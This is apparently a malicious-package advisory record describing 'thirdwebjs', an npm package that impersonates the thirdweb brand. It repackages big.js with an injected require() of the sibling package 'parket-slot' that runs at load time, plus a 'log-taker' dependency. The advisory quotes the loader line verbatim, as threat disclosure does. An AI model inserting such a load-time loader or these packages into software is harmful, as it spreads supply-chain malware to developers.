MAL-2026-6344

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (c8822953aa63581fd4fb3ea5a1511d646a56f6629e228257b37eb904efdee8e3) Package name impersonates the well-known 'thirdweb' brand but ships a verbatim copy of MikeMcl's big.js arithmetic library with an injected loader. Both entrypoints declared in package.json exports (big.js line 606 and big.mjs line 606) contain `try { const doc = require("parket-slot"); doc.from_str().then(e => {}).catch(e => {}) } catch (error) {} ` — a require() that fires at library-load time and hands execution to the sibling package 'parket-slot'. package.json line 58 also declares `"log-taker": "^0.0.9"` as a runtime dependency, pulling a second attacker-controlled sibling into the installer's tree. The legitimate big.js source contains no such require. Any consumer that installs and requires/imports thirdwebjs in either CommonJS or ESM auto-executes code from parket-slot, with log-taker additionally resolved into node_modules at install time. This is a brand-impersonation dropper using sibling packages as the payload delivery channel.